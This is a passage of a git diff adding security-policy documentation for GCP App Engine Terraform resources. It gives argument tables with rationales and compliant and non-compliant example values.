Typically bottlenecked by CPU or memory rather than storage. | None | None | +| `network_utilization` | Target scaling by network usage. Structure is [documented below](#nested_automatic_scaling_network_utilization). | false | false | Scaling based on data throughput can be highly inconsistent while CPU-based scaling provides a more stable and accurate signal for when an instance is reaching its operational capacity. | None | None | + +### manual_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `instances` | Number of instances to assign to the service at the start. **Note:** When managing the number of instances at runtime through the App Engine Admin API or the (now deprecated) Python 2 Modules API set_num_instances() you must use `lifecycle.ignore_changes = ["manual_scaling"[0].instances]` to prevent drift detection. | true | false | None | None | None | + +### volumes Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Unique name for the volume. | true | false | None | None | None | +| `volume_type` | Underlying volume type, e.g. 'tmpfs'. | true | false | None | None | None | +| `size_gb` | Volume size in gigabytes. | true | false | None | None | None | + +### script Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `script_path` | Path to the script from the application root directory. | true | false | None | None | None | + +### static_files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | Path to the static files matched by the URL pattern, from the application root directory. The path can refer to text matched in groupings in the URL pattern. | false | false | None | None | None | +| `upload_path_regex` | Regular expression that matches the file paths for all files that should be referenced by this handler. | false | false | None | None | None | +| `http_headers` | HTTP headers to use for all responses from these URLs. An object containing a list of "key:value" value pairs.". | false | false | None | None | None | +| `mime_type` | MIME type used to serve all files served by this handler. Defaults to file-specific MIME types, which are derived from each file's filename extension. | false | false | None | None | None | +| `expiration` | Time a static file served by this handler should be cached by web proxies and browsers. A duration in seconds with up to nine fractional digits, terminated by 's'. Example "3.5s". Default is '0s' | false | false | None | None | None | +| `require_matching_file` | Whether this handler should match the request if the file referenced by the handler does not exist. | false | false | None | None | None | +| `application_readable` | Whether files should also be uploaded as code data. By default, files declared in static file handlers are uploaded as static data and are only served to end users; they cannot be read by the application. If enabled, uploads are charged against both your code and static data storage resource quotas. | false | false | None | None | None | + +### zip Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_url` | Source URL | true | true | To ensure that the application's source code is retrieved from a managed version-controlled repository, using an immutable path. | https://storage.googleapis.com/hardhat-bucket/hello-world.zip | invalid.com | +| `files_count` | files count | false | false | None | None | None | + +### files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | | false | false | None | None | None | +| `sha1_sum` | SHA1 checksum of the file | false | false | None | None | None | +| `source_url` | Source URL | true | false | None | None | None | + +### container Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `image` | URI to the hosted container image in Google Container Registry. The URI must be fully qualified and include a tag or digest. Examples: "gcr.io/my-project/image:tag" or "gcr.io/my-project/image@digest" | true | false | None | None | None | + +### cloud_build_options Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `app_yaml_path` | Path to the yaml file used in deployment, used to determine runtime configuration details. | true | false | None | None | None | +| `cloud_build_timeout` | The Cloud Build timeout used as part of any dependent builds performed by version creation. Defaults to 10 minutes. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". | false | false | None | None | None | + +### cpu_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `aggregation_window_length` | Period of time over which CPU utilization is calculated. | false | false | None | None | None | +| `target_utilization` | Target CPU utilization ratio to maintain when scaling. Must be between 0 and 1. | true | false | None | None | None | + +### request_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_request_count_per_second` | Target requests per second. | false | false | None | None | None | +| `target_concurrent_requests` | Target number of concurrent requests. | false | false | None | None | None | + +### disk_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_write_bytes_per_second` | Target bytes written per second. | false | false | None | None | None | +| `target_write_ops_per_second` | Target ops written per second. | false | false | None | None | None | +| `target_read_bytes_per_second` | Target bytes read per second. | false | false | None | None | None | +| `target_read_ops_per_second` | Target ops read per seconds. | false | false | None | None | None | + +### network_utilization Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_sent_bytes_per_second` | Target bytes sent per second. | false | false | None | None | None | +| `target_sent_packets_per_second` | Target packets sent per second. | false | false | None | None | None | +| `target_received_bytes_per_second` | Target bytes received per second. | false | false | None | None | None | +| `target_received_packets_per_second` | Target packets received per second. | false | false | None | None | None | diff --git a/docs/gcp/App_Engine/app_engine_service_network_settings.md b/docs/gcp/App_Engine/app_engine_service_network_settings.md new file mode 100644 index 000000000..2b0d34016 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_service_network_settings.md @@ -0,0 +1,21 @@ +## 🛡️ Policy Deployment Engine: `app_engine_service_network_settings` + +This section provides a concise policy evaluation for the `app_engine_service_network_settings` resource in GCP. + +Reference: [Terraform Registry – app_engine_service_network_settings](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_service_network_settings) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `service` | The name of the service these settings apply to. | true | true | Enforced to establish a verifiable network perimeter at the application layer. | app-internal-service | internal-service | +| `network_settings` | Ingress settings for this service. Will apply to all versions. Structure is [documented below](#nested_network_settings). | true | true | Enforced to ensure the definition of the fundamental trust boundary of the application | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | + +### network_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `ingress_traffic_allowed` | The ingress settings for version or service. Default value is `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`. Possible values are: `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`, `INGRESS_TRAFFIC_ALLOWED_ALL`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB`. | false | true | Is enforced to mitigate the risk of direct-to-origin attacks from occurring. By ensuring that the default unshielded App Engine URL is disabled. | INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY | INGRESS_TRAFFIC_ALLOWED_ALL | diff --git a/docs/gcp/App_Engine/app_engine_service_split_traffic.md b/docs/gcp/App_Engine/app_engine_service_split_traffic.md new file mode 100644 index 000000000..262c7a7a4 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_service_split_traffic.md @@ -0,0 +1,23 @@ +## 🛡️ Policy Deployment Engine: `app_engine_service_split_traffic` + +This section provides a concise policy evaluation for the `app_engine_service_split_traffic` resource in GCP. + +Reference: [Terraform Registry – app_engine_service_split_traffic](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_service_split_traffic) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `service` | The name of the service these settings apply to. | true | true | To ensure that traffic splitting configurations are explicitly mapped to the correct logical microservice. | hardhat-main-api | generic-api | +| `split` | Mapping that defines fractional HTTP traffic diversion to different versions within the service. Structure is [documented below](#nested_split). | true | true | To ensure that traffic distribution is managed as code and providing an automated way to transition users to new versions while maintaining a clear record of routing logic. | None | None | +| `migrate_traffic` | If set to true traffic will be migrated to this version. | false | true | Allowing to ensure the system to warm up new instances and preventing sudden latency spikes for users during a deployment. | false | true | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | + +### split Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shard_by` | Mechanism used to determine which version a request is sent to. The traffic selection algorithm will be stable for either type until allocations are changed. Possible values are: `UNSPECIFIED`, `COOKIE`, `IP`, `RANDOM`. | false | true | To define how traffic is distributed through versions, ensuring that users have a consistent experience by consistently routing them to the same version based on their IP address. | IP | RANDOM | +| `allocations` | Mapping from version IDs within the service to fractional (0.000, 1] allocations of traffic for that version. Each version can be specified only once, but some versions in the service may not have any traffic allocation. Services that have traffic allocated cannot be deleted until either the service is deleted or their traffic allocation is removed. Allocations must sum to 1. Up to two decimal place precision is supported for IP-based splits and up to three decimal places is supported for cookie-based splits. | true | true | Ensuring to provide precise control over the percentage of traffic directed to specific versions. | v1 = 0.8 v2 = 0.2 | v1 = 0.0 v2 = 1.0 | diff --git a/docs/gcp/App_Engine/app_engine_standard_app_version.md b/docs/gcp/App_Engine/app_engine_standard_app_version.md new file mode 100644 index 000000000..bd3e8d572 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_standard_app_version.md @@ -0,0 +1,143 @@ +## 🛡️ Policy Deployment Engine: `app_engine_standard_app_version` + +This section provides a concise policy evaluation for the `app_engine_standard_app_version` resource in GCP. + +Reference: [Terraform Registry – app_engine_standard_app_version](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_standard_app_version) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `runtime` | Desired runtime. Example python27. | true | true | Ensuring the application executes in the correct environment with the specific language version required for its dependencies. | nodejs20 | nodejs10 | +| `deployment` | Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment). | true | true | To define the specific source code and files that constitute the application version ensuring that Terraform can verify and upload the correct assets to the environment. | None | None | +| `entrypoint` | The entrypoint for the application. Structure is [documented below](#nested_entrypoint). | true | true | To provide the specific command required to start the application, ensuring that the environment knows how to execute the code, with which port/startup script to initialize. | None | None | +| `service` | AppEngine service resource | true | true | Ensuring the application is deployed as a specific microservice, allowing for independent scaling and routing logic within the larger App Engine project. | default | unauthorized-app-name | +| `version_id` | Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,"default", "latest", and any name with the prefix "ah-". | false | false | To automatically generate unique timestamp identifiers for each deployment, inturn preventing naming conflicts and ensuring that new releases do not accidentally overwrite existing versions. | None | None | +| `service_account` | The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag. | false | false | Having utilise the default App Engine service account, simplifying permission management by leveraging the standard identity provided by the platform for accessing Google Cloud resources. | None | None | +| `threadsafe` | Whether multiple requests can be dispatched to this version at once. | false | false | Environment to use its default concurrency settings, ensuring the application remains stable and avoids race conditions if the codebase is not optimized for parallel request handling. | None | None | +| `app_engine_apis` | Allows App Engine second generation runtimes to access the legacy bundled services. | false | false | To ensure the application remains modern and portable | None | None | +| `runtime_api_version` | The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`. | false | false | The application utilises a second-generation runtime where the API version is automatically managed by the platform, ensuring the environment always uses the most compatible interface without manual intervention. | None | None | +| `handlers` | An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers). | false | false | For a more flexible and unified approach to request handling without platform-specific configuration. | None | None | +| `libraries` | Configuration for third-party Python runtime libraries that are required by the application. Structure is [documented below](#nested_libraries). | false | false | Uses a second-generation runtime that manages dependencies through standard package managers. | None | None | +| `env_variables` | Environment variables available to the application. | false | false | Avoid hardcoding sensitive/environment-specific data in the deployment manifest. | None | None | +| `vpc_access_connector` | Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector). | false | false | interacts with public APIs/managed services that do not require a private connection to a Virtual Private Cloud which reduces infrastructure complexity. | None | None | +| `inbound_services` | A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`. | false | false | Does not require specialised App Engine-specific features, allowing it to remain a standard web service with a smaller configuration footprint. | None | None | +| `instance_class` | Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G BasicScaling or ManualScaling: B1, B2, B4, B4_1G, B8 Defaults to F1 for AutomaticScaling and B2 for ManualScaling and BasicScaling. If no scaling is specified, AutomaticScaling is chosen. | false | true | Defined to ensure the application has the specific CPU and memory resources required for its workload. | F1 | F2 | +| `automatic_scaling` | Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling). | false | false | To prevent the application from scaling up to aggressively during minor traffic fluctuations. | None | None | +| `basic_scaling` | Basic scaling creates instances when your application receives requests. Each instance will be shut down when the application becomes idle. Basic scaling is ideal for work that is intermittent or driven by user activity. Structure is [documented below](#nested_basic_scaling). | false | false | Avoid the latency delays in relation with starting instances from zero after periods of inactivity. | None | None | +| `manual_scaling` | A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling). | false | false | To ensure the system can instead respond dynamically to traffic changes without the risk of over-provisioning/service outages during unexpected load. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID. | None | None | +| `noop_on_destroy` | If set to true, the application version will not be deleted. | false | false | To ensure Terraform can fully decommission the application version. | None | None | +| `delete_service_on_destroy` | If set to true, the service will be deleted if it is the last version. | false | false | Prevent the accidental removal of the entire service and its versions when a specific version is decommissioned. | None | None | +| `zip` | Zip | false | true | Provides a direct way to package the application's source code. | None | None | +| `files` | | false | false | None | None | None | +| `script` | | false | false | None | None | None | +| `static_files` | | false | false | None | None | None | +| `standard_scheduler_settings` | | false | false | None | None | None | + +### deployment Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `zip` | Zip File Structure is [documented below](#nested_deployment_zip). | false | true | Provides a direct way to package the application's source code. | None | None | +| `files` | Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files). | false | false | To simplify the configuration and ensure that the application package is deployed as a single consistent unit rather than managing individual file paths manually. | None | None | + +### entrypoint Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shell` | The format should be a shell command that can be fed to bash -c. | true | true | To define the startup command, as it allows for the execution of complex scripts/multiple commands within the standard shell environment. | node ./app.js | bash ./app.js | + +### handlers Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `url_regex` | URL prefix. Uses regular expression syntax, which means regexp special characters must be escaped, but should not contain groupings. All URLs that begin with this prefix are handled by this handler, using the portion of the URL after the prefix as part of the file path. | false | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `login` | Methods to restrict access to a URL based on login status. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `auth_fail_action` | Actions to take when the user is not logged in. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `redirect_http_response_code` | 30x code to use when performing redirects for the secure field. Possible values are: `REDIRECT_HTTP_RESPONSE_CODE_301`, `REDIRECT_HTTP_RESPONSE_CODE_302`, `REDIRECT_HTTP_RESPONSE_CODE_303`, `REDIRECT_HTTP_RESPONSE_CODE_307`. | false | false | None | None | None | +| `script` | Executes a script to handle the requests that match this URL pattern. Only the auto value is supported for Node.js in the App Engine standard environment, for example "script:" "auto". Structure is [documented below](#nested_handlers_handlers_script). | false | false | None | None | None | +| `static_files` | Files served directly to the user for a given URL, such as images, CSS stylesheets, or JavaScript source files. Static file handlers describe which files in the application directory are static files, and which URLs serve them. Structure is [documented below](#nested_handlers_handlers_static_files). | false | false | None | None | None | + +### libraries Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Name of the library. Example "django". | false | false | None | None | None | +| `version` | Version of the library to select, or "latest". | false | false | None | None | None | + +### vpc_access_connector Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Full Serverless VPC Access Connector name e.g. /projects/my-project/locations/us-central1/connectors/c1. | true | false | None | None | None | +| `egress_setting` | The egress setting for the connector, controlling what traffic is diverted through it. | false | false | None | None | None | + +### automatic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `max_concurrent_requests` | Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value. | false | false | None | None | None | +| `max_idle_instances` | Maximum number of idle instances that should be maintained for this version. | false | false | None | None | None | +| `max_pending_latency` | Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". | false | false | None | None | None | +| `min_idle_instances` | Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service. | false | false | None | None | None | +| `min_pending_latency` | Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". | false | false | None | None | None | +| `standard_scheduler_settings` | Scheduler settings for standard environment. Structure is [documented below](#nested_automatic_scaling_standard_scheduler_settings). | false | false | None | None | None | + +### basic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `idle_timeout` | Duration of time after the last request that an instance must wait before the instance is shut down. A duration in seconds with up to nine fractional digits, terminated by 's'. Example: "3.5s". Defaults to 900s. | false | false | None | None | None | +| `max_instances` | Maximum number of instances to create for this version. Must be in the range [1.0, 200.0]. | true | false | None | None | None | + +### manual_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `instances` | Number of instances to assign to the service at the start. **Note:** When managing the number of instances at runtime through the App Engine Admin API or the (now deprecated) Python 2 Modules API set_num_instances() you must use `lifecycle.ignore_changes = ["manual_scaling"[0].instances]` to prevent drift detection. | true | false | None | None | None | + +### zip Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_url` | Source URL | true | true | Ensuring that the deployment process uses a verified artifact that is consistent across all environments. | https://storage.googleapis.com/appengine-static-content/hello-world.zip | https://storage.googleapis.com/malicious-bucket/exploit.zip | +| `files_count` | files count | false | false | None | None | None | + +### files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | | false | false | None | None | None | +| `sha1_sum` | SHA1 checksum of the file | false | false | None | None | None | +| `source_url` | Source URL | true | false | None | None | None | + +### script Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `script_path` | Path to the script from the application root directory. | true | false | None | None | None | + +### static_files Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | Path to the static files matched by the URL pattern, from the application root directory. The path can refer to text matched in groupings in the URL pattern. | false | false | None | None | None | +| `upload_path_regex` | Regular expression that matches the file paths for all files that should be referenced by this handler. | false | false | None | None | None | +| `http_headers` | HTTP headers to use for all responses from these URLs. An object containing a list of "key:value" value pairs.". | false | false | None | None | None | +| `mime_type` | MIME type used to serve all files served by this handler. Defaults to file-specific MIME types, which are derived from each file's filename extension. | false | false | None | None | None | +| `expiration` | Time a static file served by this handler should be cached by web proxies and browsers. A duration in seconds with up to nine fractional digits, terminated by 's'. Example "3.5s". | false | false | None | None | None | +| `require_matching_file` | Whether this handler should match the request if the file referenced by the handler does not exist. | false | false | None | None | None | +| `application_readable` | Whether files should also be uploaded as code data. By default, files declared in static file handlers are uploaded as static data and are only served to end users; they cannot be read by the application. If enabled, uploads are charged against both your code and static data storage resource quotas. | false | false | None | None | None | + +### standard_scheduler_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `target_cpu_utilization` | Target CPU utilization ratio to maintain when scaling. Should be a value in the range [0.50, 0.95], zero, or a negative value. | false | false | None | None | None | +| `target_throughput_utilization` | Target throughput utilization ratio to maintain when scaling. Should be a value in the range [0.50, 0.95], zero, or a negative value. | false | false | None | None | None | +| `min_instances` | Minimum number of instances to run for this version. Set to zero to disable minInstances configuration. | false | false | None | None | None | +| `max_instances` | Maximum number of instances to run for this version. Set to zero to disable maxInstances configuration. **Note:** Starting from March 2025, App Engine sets the maxInstances default for standard environment deployments to 20. This change doesn't impact existing apps. To override the default, specify a new value between 0 and 2147483647, and deploy a new version or redeploy over an existing version. To disable the maxInstances default configuration setting, specify the maximum permitted value 2147483647. | false | false | None | None | None | diff --git a/docs/gcp/App_Engine/resource_json/app_engine_application.json b/docs/gcp/App_Engine/resource_json/app_engine_application.json index f084e39a7..45df4c175 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_application.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_application.json @@ -4,92 +4,101 @@ "arguments": { "project": { "description": "~>**NOTE:** GCP only accepts project ID, not project number. If you are using number, you may get a \"Permission denied\" error.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "required": true, + "security_impact": true, + "rationale": "To enforce the use of Project IDs over Project Numbers to prevent API resolution failures and (Permission Denied) errors during deployment.", + "compliant": "gcp-project-12345", + "non-compliant": "123456789", "parent": null }, "location_id": { - "description": "to serve the app from.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "The location to serve the app from.", + "required": true, + "security_impact": true, + "rationale": "To esnure data residency compliance, prevents deployment to unauthorized regions, as App Engine locations cannot be changed once set.", + "compliant": "australia-southeast1", + "non-compliant": "europe-west1", "parent": null }, "auth_domain": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "The domain to authenticate users with when using App Engine's User API.", + "required": false, + "security_impact": false, + "rationale": "Modern identity management is handled via Identity-Aware Proxy IAP), making the legacy domain setting redundant for security enforcement.", "compliant": null, "non-compliant": null, "parent": null }, "database_type": { "description": "Can be `CLOUD_FIRESTORE` or `CLOUD_DATASTORE_COMPATIBILITY` for new instances. To support old instances, the value `CLOUD_DATASTORE` is accepted by the provider, but will be rejected by the API. To create a Cloud Firestore database without creating an App Engine application, use the [`google_firestore_database`](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/firestore_database) resource instead.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "required": false, + "security_impact": true, + "rationale": "To enforce the selection of Cloud Firestore so the application uses Google's latest scalable database technology with modern security and consistency features.", + "compliant": "CLOUD_FIRESTORE", + "non-compliant": "CLOUD_DATASTORE_COMPATIBILITY", "parent": null }, "serving_status": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "The serving status of the app.", + "required": false, + "security_impact": true, + "rationale": "Ensures applications are deployed in an active state and prevents accidental service outages caused by manual or uncoordinated status overrides.", + "compliant": "SERVING", + "non-compliant": "USER_DISABLED", "parent": null }, "feature_settings": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "A block of optional settings to configure specific App Engine features:", + "required": false, + "security_impact": true, + "rationale": "to enforce the use of modern split health checks to ensure precise monitoring of application readiness and liveness, replacing legacy combined health checks.", "compliant": null, "non-compliant": null, "parent": null }, "split_health_checks": { - "description": "and liveness checks.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, - "parent": null + "description": "Set to false to use the legacy health check instead of the readiness and liveness checks.", + "required": true, + "security_impact": true, + "rationale": "Enables the separation of readiness and liveness probes to improve deployment reliability and prevent traffic from being routed to instances that are still initializing.", + "compliant": "split_health_checks = true", + "non-compliant": "split_health_checks = false", + "parent": "feature_settings" }, "iap": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Settings for enabling Cloud Identity Aware Proxy", + "required": false, + "security_impact": true, + "rationale": "Enforces Identity-Aware Proxy to establish a Zero Trust security layer, ensuring that only authenticated and authorized users can access the application, regardless of network location.", "compliant": null, "non-compliant": null, "parent": null }, "oauth2_client_id": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, - "parent": null + "description": "OAuth2 client ID to use for the authentication flow.", + "required": true, + "security_impact": true, + "rationale": "Mandates a valid OAuth2 Client ID to securely link the IAP to the organization's identity provider, ensuring only verified corporate credentials can grant access.", + "compliant": "12345.apps.googleusercontent.com", + "non-compliant": "incorrect-id.apps.googleusercontent.com", + "parent": "iap" }, "oauth2_client_secret": { - "description": "The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.", - "required": null, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "description": "OAuth2 client secret to use for the authentication flow. The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.", + "required": true, + "security_impact": true, + "rationale": "Ensures the authenticity of the handshake between Google Cloud and the Identity Provider to prevent man-in-the-middle attacks/unauthorized identity spoofing.", + "compliant": "GOCSPX-abc123def456_actual_secret", + "non-compliant": "12345", + "parent": "iap" + }, + "ssl_policy": { + "description": "A list of the SSL policy that will be applied. Each block has a SSL_POLICY_UNSPECIFIED, DEFAULT, and MODERN field.", + "required": false, + "security_impact": true, + "rationale": "To enforce secure managed SSL certificates to ensure all data in transit is encrypted using modern protocols and to prevent service outages caused by manual certificate expiration.", + "compliant": "AUTOMATIC", + "non-compliant": "MANUAL", "parent": null } } diff --git a/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json b/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json index 020b45eb6..d0257f953 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_application_url_dispatch_rules.json @@ -5,8 +5,8 @@ "dispatch_rules": { "description": "Rules to match an HTTP request and dispatch that request to a service. Structure is [documented below](#nested_dispatch_rules).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Establishes centralized routing logic to ensure requests are directed to the correct microservices based on URL patterns, preventing leaky traffic/unauthorized cross-service access.", "compliant": null, "non-compliant": null, "parent": null, @@ -14,37 +14,37 @@ "domain": { "description": "Domain name to match against. The wildcard \"*\" is supported if specified before a period: \"*.\". Defaults to matching all domains: \"*\".", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce strict hostname mapping to ensure traffic is only routed through approved domains, preventing 'Host Header Injection' and ensuring cross-site requests are properly isolated.", + "compliant": "hardhat.pythonanywhere.com", + "non-compliant": "invalid-domain.com", "parent": "dispatch_rules" }, "path": { "description": "Pathname within the host. Must start with a \"/\". A single \"*\" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To define explicit URL patterns to ensure sensitive application paths are strictly mapped to their intended microservices, preventing accidental exposure of internal endpoints", + "compliant": "/*", + "non-compliant": "admin/*", "parent": "dispatch_rules" }, "service": { "description": "Pathname within the host. Must start with a \"/\". A single \"*\" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce explicit mapping of URL patterns to specific microservices to ensure architectural isolation and prevent traffic from falling back to a service that may not have the appropriate security context/permissions", + "compliant": "default", + "non-compliant": "unauthorized-service", "parent": "dispatch_rules" } } }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "Unnecessary as it defaults to the provider-level project configuration if it is not provided, ensuring the resource is naturally governed by the existing project-level access controls.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json b/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json index bbd1fb750..41d797ed7 100644 --- 